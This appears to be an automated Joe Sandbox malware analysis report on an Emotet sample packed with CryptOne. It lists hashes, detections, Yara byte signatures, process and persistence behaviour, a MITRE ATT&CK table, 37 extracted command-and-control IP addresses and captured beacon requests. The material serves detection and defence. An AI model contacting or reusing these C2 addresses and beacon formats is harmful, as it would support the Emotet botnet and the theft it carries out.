Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cGOpAkgTL.exe

Overview

General Information

Sample Name:cGOpAkgTL.exe
(renamed file extension from bin to exe, renamed because original name is a hash value)
Original Sample Name:cGOpAkgTL.bin
Analysis ID:861748
MD5:b5e31f4e2836b8a67f8684988d224107
SHA1:9816f30629d210b64742be970d412512df600c11
SHA256:efed59c2b1473891a2032927baebe69c87dcace3d87e0b359fe583bbe9181b9b
Infos:

Detection

CryptOne, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
Detected CryptOne packer
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
IP address seen in connection with other malware
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Connects to several IPs in different countries
PE / OLE file has an invalid certificate
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • cGOpAkgTL.exe (PID: 2412 cmdline: C:\Users\user\Desktop\cGOpAkgTL.exe MD5: B5E31F4E2836B8A67F8684988D224107)
    • cGOpAkgTL.exe (PID: 2592 cmdline: C:\Users\user\Desktop\cGOpAkgTL.exe MD5: B5E31F4E2836B8A67F8684988D224107)
  • mapirepl.exe (PID: 1764 cmdline: C:\Windows\SysWOW64\mapirepl.exe MD5: B5E31F4E2836B8A67F8684988D224107)
    • mapirepl.exe (PID: 1624 cmdline: C:\Windows\SysWOW64\mapirepl.exe MD5: B5E31F4E2836B8A67F8684988D224107)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["104.33.204.83:443", "164.77.138.194:80", "181.16.4.180:80", "190.117.51.248:443", "23.240.26.210:80", "190.111.215.2:80", "85.105.205.77:8080", "143.0.245.169:8080", "200.55.136.2:443", "186.23.186.99:443", "51.255.50.164:8080", "192.163.199.254:8080", "23.254.203.51:8080", "72.47.248.48:8080", "69.163.33.82:8080", "73.115.132.124:80", "190.144.66.30:8080", "186.137.133.132:8080", "109.104.79.48:8080", "66.209.69.165:443", "210.2.86.72:8080", "189.208.239.98:443", "201.184.224.178:80", "92.48.118.27:8080", "173.248.147.186:80", "138.68.139.199:443", "219.94.254.93:8080", "185.86.148.222:8080", "144.76.117.247:8080", "70.28.3.120:7080", "165.227.213.173:8080", "159.65.76.245:443", "209.159.244.240:443", "5.9.128.163:8080", "190.171.105.158:7080", "184.161.177.223:8080", "186.138.205.189:80"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmpEmotetEmotet Payloadkevoreilly
    • 0x2106:$snippet2: 6A 13 68 01 00 01 00 FF 15 A8 4B 41 00 85 C0
    • 0x68d0:$snippet4: 33 C0 C7 05 B0 7C 41 00 F0 28 41 00 C7 05 B4 7C 41 00 F0 28 41 00 A3 B8 7C 41 00 A3 BC 7C 41 00 A3 C0 7C 41 00 39 05 F0 28 41 00 74 1D 8D 49 00 40 A3 B8 7C 41 00 83 3C C5 F0 28 41 00 00 75 F0 ...
    00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmpEmotetEmotet Payloadkevoreilly
      • 0x1506:$snippet2: 6A 13 68 01 00 01 00 FF 15 A8 4B 41 00 85 C0
      • 0x5cd0:$snippet4: 33 C0 C7 05 B0 7C 41 00 F0 28 41 00 C7 05 B4 7C 41 00 F0 28 41 00 A3 B8 7C 41 00 A3 BC 7C 41 00 A3 C0 7C 41 00 39 05 F0 28 41 00 74 1D 8D 49 00 40 A3 B8 7C 41 00 83 3C C5 F0 28 41 00 00 75 F0 ...
      SourceRuleDescriptionAuthorStrings
      1.2.cGOpAkgTL.exe.1d0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
        1.2.cGOpAkgTL.exe.1d0000.0.unpackEmotetEmotet Payloadkevoreilly
        • 0x906:$snippet2: 6A 13 68 01 00 01 00 FF 15 A8 4B 41 00 85 C0
        • 0x50d0:$snippet4: 33 C0 C7 05 B0 7C 41 00 F0 28 41 00 C7 05 B4 7C 41 00 F0 28 41 00 A3 B8 7C 41 00 A3 BC 7C 41 00 A3 C0 7C 41 00 39 05 F0 28 41 00 74 1D 8D 49 00 40 A3 B8 7C 41 00 83 3C C5 F0 28 41 00 00 75 F0 ...
        1.2.cGOpAkgTL.exe.1d0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          1.2.cGOpAkgTL.exe.270000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            1.2.cGOpAkgTL.exe.270000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 3 entries
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 1.2.cGOpAkgTL.exe.1d0000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["104.33.204.83:443", "164.77.138.194:80", "181.16.4.180:80", "190.117.51.248:443", "23.240.26.210:80", "190.111.215.2:80", "85.105.205.77:8080", "143.0.245.169:8080", "200.55.136.2:443", "186.23.186.99:443", "51.255.50.164:8080", "192.163.199.254:8080", "23.254.203.51:8080", "72.47.248.48:8080", "69.163.33.82:8080", "73.115.132.124:80", "190.144.66.30:8080", "186.137.133.132:8080", "109.104.79.48:8080", "66.209.69.165:443", "210.2.86.72:8080", "189.208.239.98:443", "201.184.224.178:80", "92.48.118.27:8080", "173.248.147.186:80", "138.68.139.199:443", "219.94.254.93:8080", "185.86.148.222:8080", "144.76.117.247:8080", "70.28.3.120:7080", "165.227.213.173:8080", "159.65.76.245:443", "209.159.244.240:443", "5.9.128.163:8080", "190.171.105.158:7080", "184.161.177.223:8080", "186.138.205.189:80"]}
              Source: cGOpAkgTL.exeReversingLabs: Detection: 96%
              Source: cGOpAkgTL.exeVirustotal: Detection: 63%Perma Link
              Source: cGOpAkgTL.exeAvira: detected
              Source: https://190.117.51.248:443/Avira URL Cloud: Label: malware
              Source: https://190.117.51.248:443/Virustotal: Detection: 8%Perma Link
              Source: https://104.33.204.83:443/Virustotal: Detection: 8%Perma Link
              Source: http://23.240.26.210/Virustotal: Detection: 5%Perma Link
              Source: cGOpAkgTL.exeJoe Sandbox ML: detected
              Source: 1.0.cGOpAkgTL.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen7
              Source: cGOpAkgTL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

              Networking

              barindex
              Source: Malware configuration extractorIPs: 104.33.204.83:443
              Source: Malware configuration extractorIPs: 164.77.138.194:80
              Source: Malware configuration extractorIPs: 181.16.4.180:80
              Source: Malware configuration extractorIPs: 190.117.51.248:443
              Source: Malware configuration extractorIPs: 23.240.26.210:80
              Source: Malware configuration extractorIPs: 190.111.215.2:80
              Source: Malware configuration extractorIPs: 85.105.205.77:8080
              Source: Malware configuration extractorIPs: 143.0.245.169:8080
              Source: Malware configuration extractorIPs: 200.55.136.2:443
              Source: Malware configuration extractorIPs: 186.23.186.99:443
              Source: Malware configuration extractorIPs: 51.255.50.164:8080
              Source: Malware configuration extractorIPs: 192.163.199.254:8080
              Source: Malware configuration extractorIPs: 23.254.203.51:8080
              Source: Malware configuration extractorIPs: 72.47.248.48:8080
              Source: Malware configuration extractorIPs: 69.163.33.82:8080
              Source: Malware configuration extractorIPs: 73.115.132.124:80
              Source: Malware configuration extractorIPs: 190.144.66.30:8080
              Source: Malware configuration extractorIPs: 186.137.133.132:8080
              Source: Malware configuration extractorIPs: 109.104.79.48:8080
              Source: Malware configuration extractorIPs: 66.209.69.165:443
              Source: Malware configuration extractorIPs: 210.2.86.72:8080
              Source: Malware configuration extractorIPs: 189.208.239.98:443
              Source: Malware configuration extractorIPs: 201.184.224.178:80
              Source: Malware configuration extractorIPs: 92.48.118.27:8080
              Source: Malware configuration extractorIPs: 173.248.147.186:80
              Source: Malware configuration extractorIPs: 138.68.139.199:443
              Source: Malware configuration extractorIPs: 219.94.254.93:8080
              Source: Malware configuration extractorIPs: 185.86.148.222:8080
              Source: Malware configuration extractorIPs: 144.76.117.247:8080
              Source: Malware configuration extractorIPs: 70.28.3.120:7080
              Source: Malware configuration extractorIPs: 165.227.213.173:8080
              Source: Malware configuration extractorIPs: 159.65.76.245:443
              Source: Malware configuration extractorIPs: 209.159.244.240:443
              Source: Malware configuration extractorIPs: 5.9.128.163:8080
              Source: Malware configuration extractorIPs: 190.171.105.158:7080
              Source: Malware configuration extractorIPs: 184.161.177.223:8080
              Source: Malware configuration extractorIPs: 186.138.205.189:80
              Source: Joe Sandbox ViewASN Name: MEDIATEMPLEUS MEDIATEMPLEUS
              Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
              Source: Joe Sandbox ViewIP Address: 72.47.248.48 72.47.248.48
              Source: Joe Sandbox ViewIP Address: 219.94.254.93 219.94.254.93
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 18674=JyxsXom6UbN7L7x0MHExxPuLepdn8q8/Om8UbOCmxohol0zfPBX/bKtPMK+5zZZA2DAnlO8MktmnuMRWGsIrIkN32sQfzr40PfFCZTsnbbhUwwz7kdwqm8Imofqx3LACO6iiUpGQEkQUMjc95T/X4xOL0tR0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cLNDU4HPW5G8opPQJhNtyX3lS1Y75VuOY6PNfN+SRWGqdZ9mnbqmyJMItuT6EhvLk+lj6QP9M7yZVoDvOtc5BxZ8b+3c9fGGR+D/Qad4P7SI=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.33.204.83:443Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 32794=ZXN/WSKexbCQHgzQEwfY8X7gFkPjuPH9ixTA2rYP3ZfmVxaykqF45JHOyd8U1tx/4fxTwAhH45gHxox2xkIvysWwKb2QuCU0ngEx2h1jSkgXHgs3FEvDbxxIQVOP9lY+PurSvUs09+JASqOo+ZQ8WCnghkt0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cBZULHKl4pQCgg/aIo2eAi3p3QgbNeU5eQRGIahaR6X/yYyymhPe8kyYVFpRaLcijP73Ept32tvtSZ1zp9tF/fzw9WbpfvzkDQ93ysCg09Fg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.117.51.248:443Connection: Keep-AliveCache-Control: no-cache
              Source: unknownNetwork traffic detected: IP country count 16
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
              Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
              Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 104.33.204.83
              Source: unknownTCP traffic detected without corresponding DNS query: 104.33.204.83
              Source: unknownTCP traffic detected without corresponding DNS query: 104.33.204.83
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 164.77.138.194
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 181.16.4.180
              Source: unknownTCP traffic detected without corresponding DNS query: 190.117.51.248
              Source: unknownTCP traffic detected without corresponding DNS query: 190.117.51.248
              Source: unknownTCP traffic detected without corresponding DNS query: 190.117.51.248
              Source: unknownTCP traffic detected without corresponding DNS query: 23.240.26.210
              Source: unknownTCP traffic detected without corresponding DNS query: 23.240.26.210
              Source: unknownTCP traffic detected without corresponding DNS query: 23.240.26.210
              Source: mapirepl.exe, 00000004.00000002.1157092094.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, mapirepl.exe, 00000004.00000002.1157092094.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.240.26.210/
              Source: mapirepl.exe, 00000004.00000002.1157092094.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.240.26.210/e
              Source: C:\Windows\SysWOW64\mapirepl.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.datJump to behavior
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 18674=JyxsXom6UbN7L7x0MHExxPuLepdn8q8/Om8UbOCmxohol0zfPBX/bKtPMK+5zZZA2DAnlO8MktmnuMRWGsIrIkN32sQfzr40PfFCZTsnbbhUwwz7kdwqm8Imofqx3LACO6iiUpGQEkQUMjc95T/X4xOL0tR0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cLNDU4HPW5G8opPQJhNtyX3lS1Y75VuOY6PNfN+SRWGqdZ9mnbqmyJMItuT6EhvLk+lj6QP9M7yZVoDvOtc5BxZ8b+3c9fGGR+D/Qad4P7SI=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.33.204.83:443Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 32794=ZXN/WSKexbCQHgzQEwfY8X7gFkPjuPH9ixTA2rYP3ZfmVxaykqF45JHOyd8U1tx/4fxTwAhH45gHxox2xkIvysWwKb2QuCU0ngEx2h1jSkgXHgs3FEvDbxxIQVOP9lY+PurSvUs09+JASqOo+ZQ8WCnghkt0Yg9wWhqlRvzmv8F+vOfm1b2hd30MRDlDqBbmWYr/cOYySeBgqZ5wXUMldk8EFnzOb8YQlSXAkdNp6Gbdt3odH8M7AW2fexhetxBM5uPENsIsnht/LScctTHRZ01dmYrwft9dayHFn2vFvEF59d5cBZULHKl4pQCgg/aIo2eAi3p3QgbNeU5eQRGIahaR6X/yYyymhPe8kyYVFpRaLcijP73Ept32tvtSZ1zp9tF/fzw9WbpfvzkDQ93ysCg09Fg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.117.51.248:443Connection: Keep-AliveCache-Control: no-cache

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.1d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.270000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.270000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 1.2.cGOpAkgTL.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
              Source: 1.2.cGOpAkgTL.exe.1d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
              Source: 1.2.cGOpAkgTL.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
              Source: 1.2.cGOpAkgTL.exe.270000.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
              Source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
              Source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
              Source: cGOpAkgTL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1.2.cGOpAkgTL.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: 1.2.cGOpAkgTL.exe.1d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: 1.2.cGOpAkgTL.exe.270000.1.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: 1.2.cGOpAkgTL.exe.270000.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeFile deleted: C:\Windows\SysWOW64\mapirepl.exe:Zone.IdentifierJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.datJump to behavior
              Source: cGOpAkgTL.exeStatic PE information: invalid certificate
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: cGOpAkgTL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: cGOpAkgTL.exeReversingLabs: Detection: 96%
              Source: cGOpAkgTL.exeVirustotal: Detection: 63%
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeFile read: C:\Users\user\Desktop\cGOpAkgTL.exeJump to behavior
              Source: cGOpAkgTL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\cGOpAkgTL.exe C:\Users\user\Desktop\cGOpAkgTL.exe
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeProcess created: C:\Users\user\Desktop\cGOpAkgTL.exe C:\Users\user\Desktop\cGOpAkgTL.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\mapirepl.exe C:\Windows\SysWOW64\mapirepl.exe
              Source: C:\Windows\SysWOW64\mapirepl.exeProcess created: C:\Windows\SysWOW64\mapirepl.exe C:\Windows\SysWOW64\mapirepl.exe
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeProcess created: C:\Users\user\Desktop\cGOpAkgTL.exe C:\Users\user\Desktop\cGOpAkgTL.exeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeProcess created: C:\Windows\SysWOW64\mapirepl.exe C:\Windows\SysWOW64\mapirepl.exeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@0/37
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMutant created: \Sessions\1\BaseNamedObjects\PEM96C
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M428FFFCF
              Source: C:\Windows\SysWOW64\mapirepl.exeMutant created: \BaseNamedObjects\Global\I428FFFCF
              Source: C:\Windows\SysWOW64\mapirepl.exeMutant created: \BaseNamedObjects\PEM194
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMutant created: \Sessions\1\BaseNamedObjects\PEM744
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I428FFFCF
              Source: C:\Windows\SysWOW64\mapirepl.exeMutant created: \BaseNamedObjects\PEM6E4
              Source: C:\Windows\SysWOW64\mapirepl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}Jump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}Jump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}Jump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9}Jump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeCode function: 1_2_001CCCE0 push edx; ret 1_2_001CCDF1
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeCode function: 1_2_001CCC80 push edx; ret 1_2_001CCC8B
              Source: initial sampleStatic PE information: section name: .text entropy: 7.440597257986008

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\mapirepl.exeExecutable created and started: C:\Windows\SysWOW64\mapirepl.exeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exePE file moved: C:\Windows\SysWOW64\mapirepl.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeFile opened: C:\Windows\SysWOW64\mapirepl.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exe TID: 2864Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exe TID: 1696Thread sleep time: -120000s >= -30000sJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeMemory protected: page no access | page guardJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeProcess created: C:\Users\user\Desktop\cGOpAkgTL.exe C:\Users\user\Desktop\cGOpAkgTL.exeJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeProcess created: C:\Windows\SysWOW64\mapirepl.exe C:\Windows\SysWOW64\mapirepl.exeJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mapirepl.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cGOpAkgTL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.1d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.270000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.cGOpAkgTL.exe.270000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.897365487.0000000000270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.897323249.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception11
              Process Injection
              12
              Masquerading
              OS Credential Dumping1
              Virtualization/Sandbox Evasion
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager1
              Remote System Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Process Injection
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer112
              Application Layer Protocol
